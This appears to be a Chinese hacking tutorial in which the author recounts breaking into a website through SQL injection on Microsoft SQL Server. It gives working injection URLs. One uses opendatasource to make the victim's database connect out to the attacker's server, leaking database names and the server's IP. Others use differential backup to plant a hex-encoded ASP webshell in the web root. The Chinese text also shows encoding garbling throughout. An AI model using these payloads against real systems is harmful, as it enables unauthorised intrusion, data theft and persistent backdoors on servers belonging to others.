.現(xiàn)在注入橫飛！工具一大堆，過去手工注入的時代已經(jīng)不復存在！代之的是NBSI HDSI 啊D注入工具..等等.也是廣大菜鳥的最愛了.即使什么也不會.什么也不懂.只需要點幾下鼠標.存在注入漏洞的網(wǎng)站密碼就出來了.接下來就是掃掃后臺.傳傳馬.就完了.就這樣簡單.碰到SA權限的話就.直接建立號開3389或者上傳WEBSHELL.是內網(wǎng)就映射.是DB_OWNER權限的話呢就考慮用備份差異.但是WEB和數(shù)據(jù)庫不在同一臺服務器該怎么搞呢？其實也不一定是搞不定.除了往注冊表啟動鍵值寫DOS命令，讓目標服務器下會開機執(zhí)行，不過也是有局限性的.該用戶必須授權于Master這個庫.才可調用儲存過程.很少有管理員會這樣做.所以希望很渺小.如果我們遇到這種情況的話該如何搞呢？看圖1

DB權限.列下目錄看看數(shù)據(jù)是否跟WEB在一塊.要是在一塊可考慮備份差異.不過很可惜.找來找去都沒有找到WEB目錄.如圖2

javascript:resizepic(this) border=0>

這是利用MSSQL的XP_dirtree儲存過程讀取路徑.然后寫入臨時表的結果.以前的NBSI沒這功能.小菜門只好掃掃SA啊。弄弄后臺之類的.后來NBSI增加了treelist的功能.可列出目錄，更為方便查看目錄結構.軟件信息等等.后來臭要飯的開發(fā)了Getwebshell才使這功能畢生光芒,把馬插到數(shù)據(jù)庫里，然后把數(shù)據(jù)庫備份為ASP文件.行是可行.但是數(shù)據(jù)庫要是過大的話.幾十M的WEBSHELL你說能用嗎？Xiaolu的備份差異還算不錯了.減少文件大小.進行差異備份.不過還是回到原來一點.數(shù)據(jù)和WEB不在一塊......

  其實.即使數(shù)據(jù)庫和WEB不在一塊還是有機會搞的.并不是說一點機會沒.一般服務器裝好系統(tǒng)什么的.都會裝個IIS吧？列他C盤.看看有沒有Inetpub這個目錄.就知道他有沒有裝IIS了.但是.不知道他IP也？怎么辦呢？可以這樣來，PING一下WEB服務器.掃他這一C段的1433端口.看看哪臺開了.不過這方法也不好.現(xiàn)在很多主機都啟用了防火墻.1433端口就算開了你也掃不著.這該怎么辦呢？可以利用opendatasource宏讓對方的SQL與自己的數(shù)據(jù)庫建立連接.既然能建立連接.就可以得到數(shù)據(jù)庫服務器的IP地址了.我們來試試看.有幾個前提得說一下.第一.你機器必須要有公網(wǎng)IP.而且開放的1433端口要保證能被外網(wǎng)訪問到.好.條件滿足.就開始做吧！

我現(xiàn)在搞的這站.100%數(shù)據(jù)和WEB不在一塊.但是從C盤看到了Inetpub文件夾.說明這數(shù)據(jù)庫服務器安裝了IIS.但是得不到他IP呀.怎么搞哦.簡單.就用上面所說的方法搞一下.先在本機建個庫先.打開查詢分析器輸入
create database hack520 CREATE TABLE zhu(name nvarchar(256) null);CREATE TABLE J8(id int NULL,name nvarchar(256) null); 點執(zhí)行.如圖4

javascript:resizepic(this) border=0>

建立了一個hack520的庫名.和zhu  J8兩個表.zhu里面有name這一個字段.J8也放了兩字段名.一個是id一個是name.好了.現(xiàn)在就可以開始建立連接了~~~~~~~先看一下這條SQL語句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用戶;pwd=SQL密碼;database=建立的庫名') .庫名.表名 '執(zhí)行的語句'  恩現(xiàn)在開始吧...

http://www.xxx.com/news.asp?id=126'insert%20into%20opendatasource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

在IE上執(zhí)行咯.呵呵這個時候對方就會連接到我機器的SQL服務器.不信？netstat -an看一下~圖5

javascript:resizepic(this) border=0>

哈哈已經(jīng)連過來了.現(xiàn)在數(shù)據(jù)庫服務器IP知道了.而且數(shù)據(jù)庫服務器又開了80.現(xiàn)在干什么呢？bak一個webshell上去吧.已知WEB目錄C:\Inetpub\wwwroot.好.開始
http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s-- 備份當前庫

http://www.xxx.com/news.asp?id=126;Drop table [hack520];create table [dbo].[hack520] ([cmd] [image])--  建表

http://www.xxx.com/news.asp?id=126;insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--  插入藍屏木馬

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C496E65747075625C777777726F6F745C7A68752E617370  backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 再次以差異備份得到WEBSHELL http://221.216xxx.xx/zhu.asp

接下來就是用藍屏木馬客戶端連接咯.這個就簡單了.我這里就不多說了.雖然沒有拿到WEB服務器的SHELL.但是至少也不是空手而歸.拿到了數(shù)據(jù)庫服務器的SHELL.就到這里.88

最新評論